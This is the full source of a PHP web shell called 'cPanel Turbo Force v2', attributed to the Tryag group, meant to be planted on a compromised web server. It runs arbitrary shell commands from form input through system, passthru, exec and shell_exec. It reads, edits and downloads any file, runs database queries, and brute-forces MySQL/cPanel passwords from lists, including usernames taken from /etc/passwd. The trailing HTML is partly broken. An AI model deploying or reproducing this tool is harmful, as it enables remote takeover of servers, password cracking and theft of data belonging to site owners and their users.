<html><title>cPanel Turbo Force v2</title><meta http-equiv="Content-Type" co

1. <html>
2. <title>cPanel Turbo Force v2</title>
3. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
4. <?php
5. /*
6. Turbo Force By Tryag.Cc
7. */
8. @set_time_limit(0);
9. @error_reporting(0);
10.  
11.  
12. echo '<head>
13.  
14. <style type="text/css">
15. <!--
16. body {
17. background-color: #000000;
18. font-size: 18px;
19. color: #cccccc;
20. }
21. input,textarea,select{
22. font-weight: bold;
23. color: #cccccc;
24. dashed #ffffff;
25. border: 1px
26. solid #2C2C2C;
27. background-color: #080808
28. }
29. a {
30. background-color: #151515;
31. vertical-align: bottom;
32. color: #000;
33. text-decoration: none;
34. font-size: 20px;
35. margin: 8px;
36. padding: 6px;
37. border: thin solid #000;
38. }
39. a:hover {
40. background-color: #080808;
41. vertical-align: bottom;
42. color: #333;
43. text-decoration: none;
44. font-size: 20px;
45. margin: 8px;
46. padding: 6px;
47. border: thin solid #000;
48. }
49. .style1 {
50. text-align: center;
51. }
52. .style2 {
53. color: #FFFFFF;
54. font-weight: bold;
55. }
56. .style3 {
57. color: #FFFFFF;
58. }
59. -->
60. </style>
61.  
62. </head>
63. ';
64.  
65.  
66. function in($type,$name,$size,$value,$checked=0)
67. {
68. $ret = "<input type=".$type." name=".$name." "; if($size != 0)
69. {
70. $ret .= "size=".$size." "; }
71. $ret .= "value=\"".$value."\""; if($checked) $ret .= " checked"; return $ret.">"; }
72.  
73. class my_sql
74. {
75. var $host = 'localhost'; var $port = ''; var $user = ''; var $pass = ''; var $base = ''; var $db = ''; var $connection; var $res; var $error; var $rows; var $columns; var $num_rows; var $num_fields; var $dump; function connect()
76. {
77. switch($this->db)
78. {
79. case 'MySQL': if(empty($this->port))
80. {
81. $this->port = '3306'; }
82. if(!function_exists('mysql_connect')) return 0; $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass); if(is_resource($this->connection)) return 1; $this->error = @mysql_errno()." : ".@mysql_error(); break; case 'MSSQL': if(empty($this->port))
83. {
84. $this->port = '1433'; }
85. if(!function_exists('mssql_connect')) return 0; $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass); if($this->connection) return 1; $this->error = "Can't connect to server"; break; case 'PostgreSQL': if(empty($this->port))
86. {
87. $this->port = '5432'; }
88. $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'"; if(!function_exists('pg_connect')) return 0; $this->connection = @pg_connect($str); if(is_resource($this->connection)) return 1; $this->error = @pg_last_error($this->connection); break; case 'Oracle': if(!function_exists('ocilogon')) return 0; $this->connection = @ocilogon($this->user, $this->pass, $this->base); if(is_resource($this->connection)) return 1; $error = @ocierror(); $this->error=$error['message']; break; }
89. return 0; }
90. function select_db()
91. {
92. switch($this->db)
93. {
94. case 'MySQL': if(@mysql_select_db($this->base,$this->connection)) return 1; $this->error = @mysql_errno()." : ".@mysql_error(); break; case 'MSSQL': if(@mssql_select_db($this->base,$this->connection)) return 1; $this->error = "Can't select database"; break; case 'PostgreSQL': return 1; break; case 'Oracle': return 1; break; }
95. return 0; }
96. function query($query)
97. {
98. $this->res=$this->error=''; switch($this->db)
99. {
100. case 'MySQL': if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection)))
101. {
102. $this->error = @mysql_error($this->connection); return 0; }
103. else if(is_resource($this->res))
104. {
105. return 1; }
106. return 2; break; case 'MSSQL': if(false===($this->res=@mssql_query($query,$this->connection)))
107. {
108. $this->error = 'Query error'; return 0; }
109. else if(@mssql_num_rows($this->res) > 0)
110. {
111. return 1; }
112. return 2; break; case 'PostgreSQL': if(false===($this->res=@pg_query($this->connection,$query)))
113. {
114. $this->error = @pg_last_error($this->connection); return 0; }
115. else if(@pg_num_rows($this->res) > 0)
116. {
117. return 1; }
118. return 2; break; case 'Oracle': if(false===($this->res=@ociparse($this->connection,$query)))
119. {
120. $this->error = 'Query parse error'; }
121. else
122. {
123. if(@ociexecute($this->res))
124. {
125. if(@ocirowcount($this->res) != 0) return 2; return 1; }
126. $error = @ocierror(); $this->error=$error['message']; }
127. break; }
128. return 0; }
129. function get_result()
130. {
131. $this->rows=array(); $this->columns=array(); $this->num_rows=$this->num_fields=0; switch($this->db)
132. {
133. case 'MySQL': $this->num_rows=@mysql_num_rows($this->res); $this->num_fields=@mysql_num_fields($this->res); while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res))); @mysql_free_result($this->res); if($this->num_rows)
134. {
135. $this->columns = @array_keys($this->rows[0]); return 1;}
136. break; case 'MSSQL': $this->num_rows=@mssql_num_rows($this->res); $this->num_fields=@mssql_num_fields($this->res); while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res))); @mssql_free_result($this->res); if($this->num_rows)
137. {
138. $this->columns = @array_keys($this->rows[0]); return 1;}
139. ; break; case 'PostgreSQL': $this->num_rows=@pg_num_rows($this->res); $this->num_fields=@pg_num_fields($this->res); while(false !== ($this->rows[] = @pg_fetch_assoc($this->res))); @pg_free_result($this->res); if($this->num_rows)
140. {
141. $this->columns = @array_keys($this->rows[0]); return 1;}
142. break; case 'Oracle': $this->num_fields=@ocinumcols($this->res); while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++; @ocifreestatement($this->res); if($this->num_rows)
143. {
144. $this->columns = @array_keys($this->rows[0]); return 1;}
145. break; }
146. return 0; }
147. function dump($table)
148. {
149. if(empty($table)) return 0; $this->dump=array(); $this->dump[0] = '##'; $this->dump[1] = '## --------------------------------------- '; $this->dump[2] = '## Created: '.date ("d/m/Y H:i:s"); $this->dump[3] = '## Database: '.$this->base; $this->dump[4] = '## Table: '.$table; $this->dump[5] = '## --------------------------------------- '; switch($this->db)
150. {
151. case 'MySQL': $this->dump[0] = '## MySQL dump'; if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0; if(!$this->get_result()) return 0; $this->dump[] = $this->rows[0]['Create Table'].";"; $this->dump[] = '## --------------------------------------- '; if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++)
152. {
153. foreach($this->rows[$i] as $k=>$v)
154. {
155. $this->rows[$i][$k] = @mysql_real_escape_string($v);}
156. $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; }
157. break; case 'MSSQL': $this->dump[0] = '## MSSQL dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++)
158. {
159. foreach($this->rows[$i] as $k=>$v)
160. {
161. $this->rows[$i][$k] = @addslashes($v);}
162. $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; }
163. break; case 'PostgreSQL': $this->dump[0] = '## PostgreSQL dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++)
164. {
165. foreach($this->rows[$i] as $k=>$v)
166. {
167. $this->rows[$i][$k] = @addslashes($v);}
168. $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; }
169. break; case 'Oracle': $this->dump[0] = '## ORACLE dump'; $this->dump[] = '## under construction'; break; default: return 0; break; }
170. return 1; }
171. function close()
172. {
173. switch($this->db)
174. {
175. case 'MySQL': @mysql_close($this->connection); break; case 'MSSQL': @mssql_close($this->connection); break; case 'PostgreSQL': @pg_close($this->connection); break; case 'Oracle': @oci_close($this->connection); break; }
176. }
177. function affected_rows()
178. {
179. switch($this->db)
180. {
181. case 'MySQL': return @mysql_affected_rows($this->res); break; case 'MSSQL': return @mssql_affected_rows($this->res); break; case 'PostgreSQL': return @pg_affected_rows($this->res); break; case 'Oracle': return @ocirowcount($this->res); break; default: return 0; break; }
182. }
183. }
184. if(!empty($_POST['cccc']) && $_POST['cccc']=="download_file" && !empty($_POST['d_name']))
185. {
186. if(!$file=@fopen($_POST['d_name'],"r"))
187. {
188. err(1,$_POST['d_name']); $_POST['cccc']=""; }
189. else
190. {
191. @ob_clean(); $filename = @basename($_POST['d_name']); $filedump = @fread($file,@filesize($_POST['d_name'])); fclose($file); $content_encoding=$mime_type=''; compress($filename,$filedump,$_POST['compress']); if (!empty($content_encoding))
192. {
193. header('Content-Encoding: ' . $content_encoding); }
194. header("Content-type: ".$mime_type); header("Content-disposition: attachment; filename=\"".$filename."\";"); echo $filedump; exit(); }
195. }
196. if(isset($_GET['phpinfo']))
197. {
198. echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
199. if (!empty($_POST['cccc']) && $_POST['cccc']=="db_query")
200. {
201. echo $head; $sql = new my_sql(); $sql->db = $_POST['db']; $sql->host = $_POST['db_server']; $sql->port = $_POST['db_port']; $sql->user = $_POST['mysql_l']; $sql->pass = $_POST['mysql_p']; $sql->base = $_POST['mysql_db']; $querys = @explode(';',$_POST['db_query']); echo '<body bgcolor=#e4e0d8>'; if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=red><b>".$sql->error."</b></font></div>"; else
202. {
203. if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=red><b>".$sql->error."</b></font></div>"; else
204. {
205. foreach($querys as $num=>$query)
206. {
207. if(strlen($query)>5)
208. {
209. echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>"; switch($sql->query($query))
210. {
211. case '0': echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>"; break; case '1': if($sql->get_result())
212. {
213. echo "<table width=100%>"; foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES); $keys = @implode("&nbsp;</b></font></td><td bgcolor=#800000><font face=Verdana size=-2><b>&nbsp;", $sql->columns); echo "<tr><td bgcolor=#800000><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>"; for($i=0;$i<$sql->num_rows;$i++)
214. {
215. foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES); $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$sql->rows[$i]); echo '<tr><td><font face=Verdana size=-2>&nbsp;'.$values.'&nbsp;</font></td></tr>'; }
216. echo "</table>"; }
217. break; case '2': $ar = $sql->affected_rows()?($sql->affected_rows()):('0'); echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>"; break; }
218. }
219. }
220. }
221. }
222. echo "<br><title>Turbo Force By Tryag</title><form name=form method=POST>";
223. echo in('hidden','db',0,$_POST['db']); echo in('hidden','db_server',0,$_POST['db_server']); echo in('hidden','db_port',0,$_POST['db_port']); echo in('hidden','mysql_l',0,$_POST['mysql_l']); echo in('hidden','mysql_p',0,$_POST['mysql_p']); echo in('hidden','mysql_db',0,$_POST['mysql_db']); echo in('hidden','cccc',0,'db_query');
224. echo "<div align=center>"; echo "<font face=Verdana size=-2><b>Base: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>"; echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>"; echo "</form>"; echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
225.  
226.  
227.  
228.  
229.  
230.  
231.  
232.  
233.  
234.  
235.  
236.  
237.  
238.  
239.  
240.  
241.  
242.  
243.  
244.  
245.  
246.  
247.  
248. function ccmmdd($ccmmdd2,$att)
249. {
250. global $ccmmdd2,$att;
251. echo '
252. <table style="width: 100%" class="style1" dir="rtl">
253. <tr>
254. <td class="style9"><strong>موجة الأومر</strong></td>
255. </tr>
256. <tr>
257. <td class="style13">
258. <form method="post">
259. <select name="att" dir="rtl" style="height: 109px" size="6">
260. ';
261. if($_POST['att']==null)
262. {
263. echo ' <option value="system" selected="">system</option>';
264. }else{
265. echo " <option value='$_POST[att]' selected=''>$_POST[att]</option>
266. <option value=system>system</option>
267. ";
268.  
269.  
270. }
271.  
272. echo '
273. <option value="passthru">passthru</option>
274. <option value="exec">exec</option>
275. <option value="shell_exec">shell_exec</option>
276. </select>
277. <input name="page" value="ccmmdd" type="hidden"><br>
278. <input dir="ltr" name="ccmmdd2" style="width: 173px" type="text" value="';if(!$_POST['ccmmdd2']){echo 'dir';}else{echo $_POST['ccmmdd2'];}echo '"><br>
279. <input type="submit" value="تنفيذ">
280. </form>
281.  
282. </td>
283. </tr>
284. <tr>
285. <td class="style13">
286. ';
287.  
288. if($_POST[att]=='system')
289. {
290. echo '
291. <textarea dir="ltr" name="TextArea1" style="width: 745px; height: 204px">';
292. system($_POST['ccmmdd2']);
293. echo ' </textarea>';
294.  
295.  
296. }
297.  
298. if($_POST[att]=='passthru')
299. {
300. echo '
301. <textarea dir="ltr" name="TextArea1" style="width: 745px; height: 204px">';
302. passthru($_POST['ccmmdd2']);
303. echo ' </textarea>';
304.  
305.  
306. }
307.  
308.  
309.  
310.  
311.  
312. if($_POST[att]=='exec')
313. {
314.  
315. echo ' <textarea dir="ltr" name="TextArea1" style="width: 745px; height: 204px">';
316. exec($_POST['ccmmdd2'],$res);
317. echo $res = join("\n",$res);
318. echo ' </textarea>';
319.  
320.  
321. }
322.  
323.  
324.  
325.  
326.  
327.  
328.  
329. if($_POST[att]=='shell_exec')
330. {
331.  
332. echo ' <textarea dir="ltr" name="TextArea1" style="width: 745px; height: 204px">';
333. echo shell_exec($_POST['ccmmdd2']);
334. echo ' </textarea>';
335.  
336.  
337. }
338. echo '
339. </td>
340. </tr>
341. </table>
342. ';
343.  
344. exit;
345. }
346.  
347. if($_POST['page']=='edit')
348. {
349.  
350. $code=@str_replace("\r\n","\n",$_POST['code']);
351. $code=@str_replace('\\','',$code);
352. $fp = fopen($pathclass, 'w');
353. fwrite($fp,"$code");
354. fclose($fp);
355. echo "<center><b>OK Edit<br><br><br><br><a href=".$_SERVER['PHP_SELF'].">BACK</a>";
356. exit;
357. }
358.  
359.  
360.  
361.  
362.  
363.  
364.  
365. if($_POST['page']=='show')
366. {
367. $pathclass =$_POST['pathclass'];
368. echo '
369. <form method="POST">
370. <input type="hidden" name="page" value="edit">
371. ';
372.  
373. $sahacker = fopen($pathclass, "rb");
374. echo '<center>'.$pathclass.'<br><textarea dir="ltr" name="code" style="width: 845px; height: 404px">';
375. $code = fread($sahacker, filesize($pathclass));
376. echo $code =htmlspecialchars($code);
377. echo '</textarea>';
378. fclose($sahacker);
379. echo '
380. <br><input type="text" name="pathclass" value="'.$pathclass.'" style="width: 445px;">
381. <br><strong><input type="submit" value="edit file">
382. </form>
383. ';
384. exit;
385. }
386.  
387.  
388.  
389.  
390. if($_POST['page']=='ccmmdd')
391. {
392. echo ccmmdd($ccmmdd2,$att);
393. exit;
394. }
395.  
396.  
397.  
398.  
399.  
400.  
401.  
402.  
403.  
404.  
405.  
406.  
407.  
408.  
409.  
410.  
411.  
412.  
413.  
414.  
415.  
416.  
417.  
418.  
419. if($_POST['page']=='find')
420. {
421. if(isset($_POST['usernames']) && isset($_POST['passwords']))
422. {
423. if($_POST['type'] == 'passwd'){
424. $e = explode("\n",$_POST['usernames']);
425. foreach($e as $value){
426. $k = explode(":",$value);
427. $username .= $k['0']." ";
428. }
429. }elseif($_POST['type'] == 'simple'){
430. $username = str_replace("\n",' ',$_POST['usernames']);
431. }
432. $a1 = explode(" ",$username);
433. $a2 = explode("\n",$_POST['passwords']);
434. $id2 = count($a2);
435. $ok = 0;
436. foreach($a1 as $user )
437. {
438. if($user !== '')
439. {
440. $user=trim($user);
441. for($i=0;$i<=$id2;$i++)
442. {
443. $pass = trim($a2[$i]);
444. if(@mysql_connect('localhost',$user,$pass))
445. {
446. echo "TrYag~ user is (<b><font color=green>$user</font></b>) Password is (<b><font color=green>$pass</font></b>)<br />";
447. $ok++;
448. }
449. }
450. }
451. }
452. echo "<hr><b>You Found <font color=green>$ok</font> Cpanel By Tryag Script Name</b>";
453. echo "<center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>";
454. exit;
455. }
456. }
457. ?>
458.  
459.  
460.  
461.  
462. <form method="POST" target="_blank">
463. <strong>
464. <input name="page" type="hidden" value="find">
465. </strong>
466. <table width="600" border="0" cellpadding="3" cellspacing="1" align="center">
467. <tr>
468. <td valign="top" bgcolor="#151515"><center><strong><img src="http://www.tryag.cc/img/logo-team.gif" /><br>
469. </strong>
470. <a href="http://tryag.cc" class="style2"><strong>Turbo Force By Tryag</strong></a></center></td>
471. </tr>
472. <tr>
473. <td>
474. <table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">
475. <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
476. <strong>User :</strong></td>
477. <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="40" rows="10" name="usernames"></textarea></strong></td>
478. </tr>
479. <tr>
480. <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
481. <strong>Pass :</strong></td>
482. <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="40" rows="10" name="passwords"></textarea></strong></td>
483. </tr>
484. <tr>
485. <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
486. <strong>Type :</strong></td>
487. <td valign="top" bgcolor="#151515" colspan="5">
488. <span class="style2"><strong>Simple : </strong> </span>
489. <strong>
490. <input type="radio" name="type" value="simple" checked="checked" class="style3"></strong>
491. <font class="style2"><strong>/etc/passwd : </strong> </font>
492. <strong>
493. <input type="radio" name="type" value="passwd" class="style3"></strong><span class="style3"><strong>
494. </strong>
495. </span>
496. </td>
497. </tr>
498. <tr>
499. <td valign="top" bgcolor="#151515" style="width: 139px"></td>
500. <td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="start">
501. </strong>
502. </td>
503. <tr>
504. </form>
505.  
506. <td valign="top" colspan="6"><strong></strong></td>
507.  
508. <form method="POST" target="_blank">
509. <strong>
510. <input type="hidden" name="go" value="cmd_mysql">
511. </strong>
512. <tr>
513. <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>CMD MYSQL</strong></td>
514. </tr>
515. <tr>
516. <td valign="top" bgcolor="#151515" style="width: 139px"><strong>user</strong></td>
517. <td valign="top" bgcolor="#151515"><strong><input name="mysql_l" type="text"></strong></td>
518. <td valign="top" bgcolor="#151515"><strong>pass</strong></td>
519. <td valign="top" bgcolor="#151515"><strong><input name="mysql_p" type="text"></strong></td>
520. <td valign="top" bgcolor="#151515"><strong>database</strong></td>
521. <td valign="top" bgcolor="#151515"><strong><input name="mysql_db" type="text"></strong></td>
522. </tr>
523. <tr>
524. <td valign="top" bgcolor="#151515" style="height: 25px; width: 139px;">
525. <strong>cmd ~</strong></td>
526. <td valign="top" bgcolor="#151515" colspan="5" style="height: 25px">
527. <strong>
528. <textarea name="db_query" style="width: 353px; height: 89px">SHOW DATABASES;
529. SHOW TABLES user_vb ;
530. SELECT * FROM user;
531. SELECT version();
532. SELECT user();</textarea></strong></td>
533. </tr>
534. <tr>
535. <td valign="top" bgcolor="#151515" style="width: 139px"><strong></strong></td>
536. <td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="run"></strong></td>
537. </tr>
538. <input name="db" value="MySQL" type="hidden">
539. <input name="db_server" type="hidden" value="localhost">
540. <input name="db_port" type="hidden" value="3306">
541. <input name="cccc" type="hidden" value="db_query">
542.  
543. </form>
544. <tr>
545. <td valign="top" bgcolor="#151515" colspan="6"><strong></strong></td>
546.  
547.  
548. </tr>
549.  
550. <form method="POST" target="_blank">
551. <tr>
552. <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>CMD
553. system - passthru - exec - shell_exec</strong></td>
554. </tr>
555. <tr>
556. <td valign="top" bgcolor="#151515" style="width: 139px"><strong>cmd ~</strong></td>
557. <td valign="top" bgcolor="#151515" colspan="5">
558. <select name="att" dir="rtl" size="1">
559. <?php
560. if($_POST['att']==null)
561. {
562. echo ' <option value="system" selected="">system</option>';
563. }else{
564. echo " <option value='$_POST[att]' selected=''>$_POST[att]</option>
565. <option value=system>system</option>
566. ";
567.  
568.  
569. }
570. ?>
571.  
572. <option value="passthru">passthru</option>
573. <option value="exec">exec</option>
574. <option value="shell_exec">shell_exec</option>
575. </select>
576. <strong>
577. <input name="page" type="hidden" value="ccmmdd">
578. <input name="ccmmdd2" type="text" style="width: 284px" value="ls -la"></strong></td>
579. </tr>
580. <tr>
581. <td valign="top" bgcolor="#151515" style="width: 139px"><strong></strong></td>
582. <td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="go"></strong></td>
583. </tr>
584. </form>
585.  
586. <form method="POST" target="_blank">
587.  
588. <tr>
589. <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Show
590. File And Edit</strong></td>
591. </tr>
592. <tr>
593. <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Path ~</strong></td>
594. <td valign="top" bgcolor="#151515" colspan="5">
595. <strong>
596. <input name="pathclass" type="text" style="width: 284px" value="<?php echo realpath('')?>"></strong></td>
597. </tr>
598. <tr>
599. <td valign="top" bgcolor="#151515" style="width: 139px"><strong></strong></td>
600. <td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="show"></strong></td>
601. </tr>
602. <input name="page" type="hidden" value="show">
603. </form>
604. <tr>
605. <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Info
606. Security</strong></td>
607. </tr>
608. <tr>
609. <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Safe Mode</strong></td>
610. <td valign="top" bgcolor="#151515" colspan="5">
611. <strong>
612. <?php
613. $safe_mode = ini_get('safe_mode');
614. if($safe_mode=='1')
615. {
616. echo 'ON';
617. }else{
618. echo 'OFF';
619. }
620.  
621. ?>
622. </strong>
623. </td>
624. </tr>
625. <tr>
626. <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Function</strong></td>
627. <td valign="top" bgcolor="#151515" colspan="5">
628. <strong>
629. <?php
630. if(''==($func=@ini_get('disable_functions')))
631. {
632. echo "<font color=#00800F>No Security for Function</font></b>";
633. }else{
634. echo "<font color=red>$func</font></b>";
635. }
636. ?></strong></td>
637. <tr>
638. <td valign="top" bgcolor="#151515" style="width: 139px"><strong></strong></td>
639. <td valign="top" bgcolor="#151515" colspan="5"><strong></strong></td>
640. </table>
641. </td>
642. </tr>
643. </table>
644.  
645.  
646.  
647.  
648. <meta http-equiv="content-type" content="text/html; charset=UTF-8"></head><body></body></html>
649.  
650.  
651.  
652.  
653.  
654. <form style="border: 0px ridge #FFFFFF">
655.  
656.  
657.  
658.  
659. <p align="center"></td>
660. </tr><div align="center">
661.  
662. <tr>
663.  
664.  
665.  
666. <input type="submit" name="user" value="user"><option value="name"></select>
667. </form>
668.  
669.  
670. <div align="center">
671. <table border="5" width="10%" bordercolorlight="#008000" bordercolordark="#006A00" height="100" cellspacing="5">
672. <tr>
673. <td bordercolorlight="#008000" bordercolordark="#006A00">
674. <p align="left">
675. <textarea method='POST' rows="25" name="S1" cols="16">
676.  
677.  
678. <?php
679.  
680.  
681.  
682. if ($_GET['user'] )
683.  
684.  
685. system('ls /var/mail');
686.  
687.  
688.  
689.  
690.  
691. for($uid=0;$uid<90000;$uid++){
692.  
693. }
694.  
695.  
696.  
697.  
698. ?></textarea>